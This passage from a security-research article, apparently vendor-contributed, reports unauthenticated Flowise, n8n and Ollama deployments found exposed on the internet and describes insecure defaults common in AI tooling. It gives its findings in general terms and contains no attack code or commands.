We also discovered exposed instances of agent management platforms, including n8n and Flowise. Some instances that users clearly thought were internal had been exposed to the internet without authentication. One of the most egregious examples was a Flowise instance that exposed the entire business logic of an LLM chatbot service.

Their credential list was exposed too. Flowise was hardened enough not to reveal the stored values to an unauthenticated visitor, which limits the immediate damage, but an attacker could still use the tools connected to those credentials to exfiltrate sensitive information.

This is what makes these platforms particularly dangerous. There's a distinct absence of proper access management controls in AI tooling, meaning access to a bot that's integrated with a third-party system often means access to everything it touches.

In another example, the setup exposed a number of internet parsing tools and potentially dangerous local functions, such as file writes and code interpreting, making server-side code execution a realistic prospect.

We identified over 90 exposed instances across sectors such as government, marketing, and finance. All of those chatbots, their workflows, prompts, and outward access were open. An attacker could modify the workflows, redirect traffic, expose user data, or poison responses. 

Saying hello to unsecured Ollama APIs

One of the more surprising findings was the sheer number of exposed Ollama APIs accessible without authentication, with a model connected. We fired a single prompt ("Hello") to every server that listed a connected model, to see if we’d be prompted to authenticate. Of the 5,200+ servers queried, 31% answered. 

The responses gave a window into what these APIs were being used for. We couldn't morally explore any further, but the implications are far-reaching. A few examples:

"Greetings, Master. Your command is my law. What is your desire? Speak freely. I am here to fulfill it, without hesitation or question."

"I am here to assist you in any way I can with your health and wellbeing issues. Whether it's anxiety, sleep problems, or other concerns, don't hesitate to ask me for help."

"Welcome! I'm an AI assistant integrated with our cloud management systems. I can help you with operational tasks, infrastructure deployment, and service queries."

Ollama doesn't store messages directly, so there's no immediate risk of conversation data being exposed. But many of these instances were wrapping paid frontier models from Anthropic, Deepseek, Moonshot, Google, and OpenAI. Of all the models identified across all servers, 518 were wrapping well-known frontier models.

Insecure by design

After triaging the results, it was clear that some of the tech warranted a closer look. We spent time analyzing a subset of the applications in a lab environment — and found repeated insecure patterns throughout:

  • Poor deployment practices: Insecure defaults, misconfigured Docker setups, hardcoded credentials, applications running as root
  • No authentication on fresh installs: Many projects drop users straight into a high-privilege account with full management access
  • Hardcoded and static credentials: Embedded in setup examples and docker-compose files rather than generated on installation
  • New technical vulnerabilities: Within a couple of days of lab work, we had already found arbitrary code execution in one popular AI project

These misconfigurations are made even worse when agents have access to tools like code interpretation. The blast radius gets significantly larger when sandboxing is weak, and the infrastructure isn't sitting in a DMZ.

Speed is winning. Security is lagging behind

Some of the projects powering LLM infrastructure have clearly abandoned decades of hard-won security best practices in favour of shipping fast. That said, it's not purely a vendor problem. The speed of AI adoption and the pressure to beat competitors to market are what’s driving it.

Don't wait for an attacker to find your exposed AI infrastructure first. Intruder finds misconfigurations and shows you what's visible from the outside.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/OVwm1tn
via IFTTT